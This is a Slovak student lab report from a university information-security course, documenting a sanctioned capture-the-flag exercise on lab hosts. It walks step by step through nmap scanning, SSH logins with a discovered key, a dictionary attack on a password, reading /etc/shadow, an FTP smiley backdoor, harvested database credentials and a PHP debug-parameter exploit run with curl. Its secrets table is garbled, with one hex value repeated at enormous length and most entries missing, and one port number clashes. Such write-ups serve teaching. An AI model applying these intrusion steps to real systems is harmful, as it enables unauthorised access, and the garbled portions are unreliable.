FAKULTA INFORMAČNÍCH TECHNOLOGIÍ VYSOKÉ UČENÍ TECHNICKÉ V BRNĚ



BIS
Bezpečnost informačních systémů

Tajomstvo BIS

Obsah

1	$ m \acute{U}vod$	2
2	Tajomstvá	2
3	Analýza	2
4	Tajomstvo C	3
5	Tajomstvo I	3
6	Tajomstvo E	3
7	Tajomstvo F	4
8	Tajomstvo D	5
9	Tajomstvo G	5
10	Tajomstvo A	6
11	Tajomstvo H	6
12	Tajomstvo J	6
13	Tajomstvo B	7

1 Úvod

Cieľom projektu bolo uskutočniť APT útok na zadaný server. Výsledok útoku spočíval v odhalení všetkých tajomstiev ktoré boli poukrývané na rôznych miestach. Nasledujúce kapitoly popisujú proces hľadania jednotlivých tajomstiev po pripojení pomocou privátneho kľúča na bis.fit.vutbr.cz.

2 Tajomstvá

```
Kapitola 10
                                     {\tt A\_20-11-16-10-01\_2808ed0cf1d2ad2024a572ae6075f14cbe9c4e5103493dc088cf846d0ffa9f0d}
Kapitola 13
                                     B_21-11-22-59-01_fd5e5384449c8f7210aeae754d02913a70e3b0cc52e933ab18dec768a6c346b0
   Kapitola 4
                                     \texttt{C\_17-11-19-41-01\_47533bc4b523ba4f7d0ebef3d25fe654f5ec126bc6a161394b027f4355ed6f64}
   Kapitola 8
                                     Kapitola 6
                                     Kapitola 7
                                     F\_18-11-22-13-01\_2d04f2e14d44efadf60e1921b8902d2648c65dfe364dbc0cb23da17d4008cf62af62af64dbc0cb23da17d4008cf62af62af64dbc0cb23da17d4008cf62af62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17d4008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb23da17dd008cf62af64dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0cb24dbc0
   Kapitola 9
                                     Kapitola 11
                                     Kapitola 5
                                     Kapitola 12
```

Jednotlivé kapitoly popisujúce odhalené tajomstvá sú usporiadané do kapitol na základe poradia odhalenia jednotlivých tajomstiev.

3 Analýza

Po pripojení na bis.fit.vutbr.cz som si najskôr prezrel \$HOME pomocou "1s -R -A \$HOME". Odhalil som v priečinku .Trash privátny kľúč používateľa itcrowd. Následne na to, som si zistil IP adresu zariadenia pomocou "ip addr". IP adresa zariadenia: 192.168.122.6, maska siete: 255.255.255.0. Zanalyzoval som si sieť v ktorej sa nachádza toto zariadenie pomocou "nmap 192.168.122.6/24 -Pn". Vo výstupe som spozoroval ptest, tak na základe tohto, som spustil príkaz "nmap 192.168.122.6/24 -Pn | grep -A 6 "ptest"". Získal som nasledujúci výsledok:

```
Nmap scan report for ptest1.bis.mil (192.168.122.143)
Host is up (0.00072s latency).
Not shown: 998 closed ports
PORT
       STATE SERVICE
21/tcp open
              ftp
22/tcp open
              ssh
Nmap scan report for ptest2.bis.mil (192.168.122.27)
Host is up (0.00049s latency).
Not shown: 997 closed ports
PORT
         STATE SERVICE
22/\mathrm{tcp}
          open
                 ssh
80/\text{tcp}
          open
                http
3306/\text{tcp} open
                mysql
```

```
Nmap scan report for ptest3.bis.mil (192.168.122.22)
Host is up (0.00062s latency).
Not shown: 997 closed ports
PORT
        STATE SERVICE
22/\text{tcp}
        open
               ssh
80/\text{tcp}
         open
               http
111/tcp open
               rpcbind
Nmap scan report for ptest4.bis.mil (192.168.122.210)
Host is up (0.0016s latency).
Not shown: 997 closed ports
PORT
         STATE SERVICE
22/\text{tcp}
          open
                ssh
53/\text{tcp}
          open
                domain
6667/tcp open
                irc
```

Z týchto poznatkov som zvážil, že by som sa pomocou odhaleného kľúča mohol vedieť pripojiť na jeden z hore uvedených zariadení. Popis pripojenia pomocou tohto privátneho kľuča pokračuje v kapitole 4.

4 Tajomstvo C

S využitím privátneho kľúča v priečinku \$HOME/.Trash/itcrowd.key pre používateľa *itcrowd* nachadzájúceho sa na *bis.fit.vutbr.cz* som sa pripojil na zariadenie ptest3 pomocou príkazu "ssh -i .Trash/itcrowd.key -l itcrowd ptest3".

Po úspešnom pripojení som si znovu preskúmal \$HOME pomocou "ls -R -A \$HOME". Keďže na *ptest3* je otvorený port *http*, tak som vykonal "cd /var/www/html && ls -R -A .". Spozoroval som súbor /var/www/html/secret.txt ktorého obsah som si následne chcel vypísať pomocou "cat secret.txt". Výpis nebol možný z dôvodu nedostatočných práv, t.j.:

```
cat: /var/www/html/secret.txt: Permission denied
```

Port http bol ale otvorený. Vyskúšal som, zda sa si ten súbor neviem stiahnuť pomocou "curl http://ptest3/secret.txt". Súbor sa mi podarilo stiahnuť a následne odhaliť tajomstvo C.

```
Ziskali jste tajemstvi
C_17-11-19-41-01_47533bc4b523ba4f7d0ebef3d25fe654f5ec126bc6a161394b027f4355ed6f64
```

5 Tajomstvo I

Tajomstvo I som získal pokračovaním v analýze priečinka /var/www/html po odhalení tajomstva C ktoré je popísané v kapitole 4. Pri vypísaní obsahu súbora /var/www/html/robots.txt pomocou "cat/var/www/html/robots.txt" som získal tajomstvo I.

```
Ziskali jste tajemstvi
I_17-11-20-14-01_adb2020a691f94c4a2b0f3ea1b16c21936567ee6b07f5a3308959c47a1b19abe
```

6 Tajomstvo E

Pri pripojení na zariadenie ptest3 pomocou príkazu "ssh -i .Trash/itcrowd.key -l itcrowd ptest3" sa zobrazila uvítacia správa ktorá obsahova *Riddle of the day*:

```
==== Riddle of the day ===== 
|>Qefkdp xob klq xitxvp texq qebv pbbj; qeb cfopq xmmbxoxkzb abzbfsbp jxkv; qeb fkqbiifdbkzblc x cbt mbozbfsbp texq exp ybbk zxobcriiv efaabk.<|
|>Ql zixfj vlro mofwb ork zljjxka: ofaaib bppbkqfxifqfbp<|
```

Zistil som, že sa jedná o Caesarovu šifru s pousnutím o 23. Dekódovaná správa vyzerala nasledovne:

```
Riddle of the day —— | > Things are not always what they seem the first appearance deceives many; the intelligence of a few perceives what has been carefully hidden. < | > To claim your prize run command: riddle essentialities < |
```

Po vykonaní príkazu "riddle essentialities" som získal tajomstvo E.

```
Ziskali jste tajemstvi
E_17-11-20-44-01_6454d0f7031b689cccb1bedf8de6f6c0b904eeaa810d7aef98bab5cba308fafe
```

7 Tajomstvo F

Všimol som si po analýze siete, ktorá je popísaná v kapitole 3, že na *ptest*// beží irc na porte 6667. Spustil som si IRC client pomocou "irssi" a následne som sa napojil na *ptest*/// pomocou "/connect ptest4". Vypísal som si zoznam kanálov (channels) pomocou "/list".

```
20:20 -!- Channel Users Name
20:20 -!- #bis 1
20:20 -!- &SERVER 0 Server Messages
20:20 -!- #anonbox 0 Post all your ideas, complaints and everyday issues.
20:20 -!- #itcrowd 0 All IT issues to be discussed here.
20:20 -!- #meetings 0 In this channel you can find transcripts of the meetings.
20:20 -!- #finances 0 Channel for accountants and all monetary operations.
20:20 -!- #internal 1 Internal affairs.
20:20 -!- #general 0 Feel free discuss various topics in here.
20:20 -!- End of LIST
```

Všimol som si že na kanále #bis sa nachádza 1 user (používateľ). Pripojil som sa na kanál #bis a vypísal som si mená na tomto kanály pomocou "/names".

```
20:26 [Users #bis]
20:26 [@Willie] [ student]
20:26 -!- Irssi: #bis: Total of 2 nicks [1 ops, 0 halfops, 0 voices, 1 normal]
```

Zistil som že @Willie je bot z github.com/mikeywaites/willie a má reagovať na určité príkazy začínajúce s bodkou. Zadal som príkaz ".commands" na ktorý mi bot reagoval:

```
20:49 <@Willie> student: I am sending you a private message of all my commands!
```

Otvoril som si privátny chat s botom kde mi @Willie poslal všetky príkazy:

 $20{:}49 < willie> Commands \ I \ recognise: CUKOO, action, addtrace, addtraceback, agreed, announce, ask, at, ban, bitcoin, blocks, btc, c, calc, ch, chairs, choice, choose, commands, comment, comments, countdown, cukoo, cur, currency, d, ddg, define, deop, devoice, dice, dict, distance, duck, endmeeting, ety, exchange, findbug, findissue, g, getchanneltimeformat, getchanneltz, getctf, getctz, getsafeforwork, getsfw,$

20:49 < Willie > gettf , gettimeformat , gettimezone , gettz , gify , gtfy , help , imdb , in , info , ip , iplookup , isup , join , kb , kick , kickban , length , link , listactions , lmgify , lmgtfy , load , makebug , makeissue , mangle , mangle 2 , mass , me , mode , movie , msg , op , part , py , quiet , quit , radio , rand , redditor , reload , roll , rss , safety , save , search , seen , set , setchanneltimeformat , setchanneltz , setctf , setctz ,

 $20{:}49 < Willie> setlocation , setsafeforwork , setsfw , settf , settimeformat , settimezone , settz , setwoeid , showmask , spell , spellcheck , startmeeting , subject , suggest , t , tell , temp , time , title , tld , tmask , topic , tr , translate , u , unban , unquiet , update , uptime , version , voice , w , wa , wea , weather , weight , wik , wiki , wolfram , wt , xkcd .$

 $20{:}49 <\! Willie \! > For help , do 'Willie: help example' where example is the name of the command you want help for .$

Ukončil som privátny chat pomocou príkazu "/q" aby som sa vrátil naspať do kanála #bis. Napísal som príkaz ".CUKOO" (podozrivý príkaz pretože nepatrí medzi bežné príkazy bota) na ktorý mi ale bot nereagoval, vyskúšal som ".help CUKOO" na čo reagoval:

```
20:56 < @Willie> student: I might spoil you a secret.
```

Znovu som si otvoril privátny chat s botom kde som vyskúšal ".CUKOO" na čo bot reagoval správou:

```
21:13 < Willie > Ziskali jste tajemstvi \\ F_{18-11-22-13-01}_{2d04f2e14d44efadf60e1921b8902d2648c65dfe364dbc0cb23da17d4008cf62 \\ 21:13 < Willie > Ziskali jste tajemstvi \\ F_{18-11-22-13-01}_{2d04f2e14d44efadf60e1921b8902d2648c65dfe364dbc0cb23da17d4008cf62 \\ \\
```

V správe som získal tajomstvo F.

```
\label{eq:Ziskali jstetajemstvi} Ziskali jste tajemstvi \\ F\_18-11-22-13-01\_2d04f2e14d44efadf60e1921b8902d2648c65dfe364dbc0cb23da17d4008cf62
```

8 Tajomstvo D

Keďže na ptest4 je otvorený port 53, vyskúšal som dotazovanie nie skutočného DNS servera - 192.168.122.1, ale DNS servera ptest4 - 192.168.122.210 pomocou dig. Pomocou príkazu "dig @192.168.122.210 ptest4.bis.mil. ANY" som zistil NS záznam pre ptest4.bis.mil ktorým bol bis.mil.. Následne som znovu poslal dotaz na ptest4 pomocou "dig @192.168.122.210 bis.mil ANY". Odhalil som, že tajomstvo sa nachádza v TXT zázname. Poslal som dotaz "dig @192.168.122.210 bis.mil TXT" ktorý mi vypísal tajomstvo D.

```
Ziskali jste tajemstvi
D_20-11-14-50-01_167443c9a637757e4f3a88a71d43db93a5a7a53bdb449958ff4d91a8ee87b034
```

9 Tajomstvo G

Na *ptest1* bol otvorený FTP port. Vyskúšal som sa pripojiť ale bez správneho prihlasovacieho mena a hesla ale nechcelo ma to pripojiť. FTP server ale obsahoval backdoor, ktorý fungoval tak, že som musel

do prihlasovacieho mena vložiť podreťazec ":)" reprezentujúci smajlík a náhodné heslo. Výsledkom bola odpoveď "220 Opened port 50331, take a look ;)" ktorú som využil tak, že som sa znovu pripojil pomocou príkazu "ftp 192.168.122.143 56530". Odhalil som tajomstvo G.

```
Ziskali jste tajemstvi
G_20-11-15-40-01_33582fcbcfaf70b70a85dd974c6831aad199fc150b7cc77c2fefaf59e87f9e4e
```

10 Tajomstvo A

V priečinku \$HOME/Documents sa nachádzali 4 súbory ktoré som odhalil analýzou, ktorá je popísaná v kapitole 3. V jednom z nich - \$HOME/Documents/tc48-2008-024-Rev4.pdf som našiel využiteľnú informáciu - "Jen Barber, jbarber@ptest1.bis.mil", ktorú som odhalil tak, že dostupné zariadenia pri analýze siete (viz kapitola 3) obsahovali reťazec ptest a tento email obsahoval slovo ptest. Na ptest1 bol otvorený SSH port tak som sa pokúsil pripojiť pomocou príkazu "ssh jbarber@ptest1.bis.mil" ktoré ale vyžadovalo heslo. Heslo som pomocou metódy brute force a pomocou 50 najčastejších hesiel t.j. slovníkový útok, hneď odhalil - "welcome". Pripojil som sa ako jbarber s heslom welcome. Po pripojení som začal analyzovať obsah \$HOME priečinka a následne som prezrel obsah /etc/passwd a /etc/shadow. Tajomstvo A sa nachádzalo v /etc/shadow (v poli pre heslo).

```
Ziskali jste tajemstvi A_20-11-16-10-01_2808ed0cf1d2ad2024a572ae6075f14cbe9c4e5103493dc088cf846d0ffa9f0d
```

11 Tajomstvo H

Analýzou priečinka \$HOME po pripojení na ptest1 (pripojenie na ptest1 je popísane v kapitole 10) som odhalil tajomstvo H v jednom zo súborov v podpriečinku \$HOME. Tajomstvo H sa nachádzalo v súbore \$HOME/Mail/Trash ktoré som získal pomocou "cat \$HOME/Mail/Trash".

```
\label{eq:Ziskali jstetajemstvi} Ziskali jste tajemstvi\\ H\_20-11-21-32-01\_e611160adcc74100c8739ad2525739abda3bdc39e471efdb5b27a01a32d0c32c
```

12 Tajomstvo J

Pri analýze priečinka \$HOME ktorý je spomenutý v kapitole 4 som odhalil v priečinku .ssh rôzne kľúče. Pomocou "cat .ssh/config" som zistil, že používateľ webmaster má prístup na ptest2.bis.mil. Vyskúšal som sa pripojiť na ptest2 ako webmaster pomocou "ssh webmaster@ptest2.bis.mil". Prihlásnie prebehlo úspešne. Analýzou spomenutej v kapitole 3 som vedel, že tu je otvorený port pre HTTP a MySQL. Zanalyzoval som priečinky zariadenia, hlavne /var/www/html kde som našiel rôzne súbory. Po dôkladnejšom preskúmaní som odhalil prihlasovacie údaje do databázy v súbore libs/constants.php pomocou "cat libs/constants.php".

```
define('DB_DRIVER', 'mysql');
define('DB_HOST', 'localhost');
define('DB_HOST_USERNAME', 'arcturus');
define('DB_HOST_PASSWORD', '16431879196842');
define('DB_DATABASE', 'arcturus');
```

Pripojil som sa do databázy pomocou "mysql -u arcturus -p16431879196842". Zanalyzoval som obsah databázy príkazmi "use <DB>; " a "select * from ". Databáza arcturus obsahovala tabuľku contracts ktorá obsahovala tajomstvo J.

 $\verb|J_20-11-22-38-01_2a87a2c2ad810dfd8d839eae1216c65732cb84a896b730c4ed77c3be966f790f||$

13 Tajomstvo B

Pokračovaním analýzou prečinka /var/www/html na ptest2 (pripojenie na ptest2 je popísané v kapitole 12) som odhalil implementačnú zraniteľnosť. Pomocou príkazu "cat index.php" som odhalil zraniteľnosť v zdrojovom kóde:

```
/* TODO: DEVELOPMENT ONLY, REMOVE IN PRODUCTION!!!

* Prints out value of a variable specified by GET parameter debug_variable
*/
if (isset($_GET['debug_variable'])) {
  var_dump(${$_GET['debug_variable']});
};
```

Na základe tejto zraniteľnosti ktorá bola dokonca i popísaná som sa snažil nájsť nejakú premennú ktorú by sa dalo vypísať pomocou tejto zraniteľnosti. Po ďalšej analýze ostatných zdrojových kódov ma zaujal súbor internal-memo.php. Pomocou príkazu "cat internal-memo.php" som odhalil:

```
<?php echo $GLOBALS['INTERNAL MSG']; ?>
```

Teraz som potreboval preniesť túto premennú do odhaleného zranitelného miesta. Dotaz "curl http://ptest2/index.php" nefungoval, ale po správnom dotaze pomocou "curl http://ptest2/index.php? debug_variable=INTERNAL_MSG" som si premennú vypísal:

Odhalil som tajomstvo B.

```
Ziskali jste tajemstvi
B_21-11-22-59-01_fd5e5384449c8f7210aeae754d02913a70e3b0cc52e933ab18dec768a6c346b0
```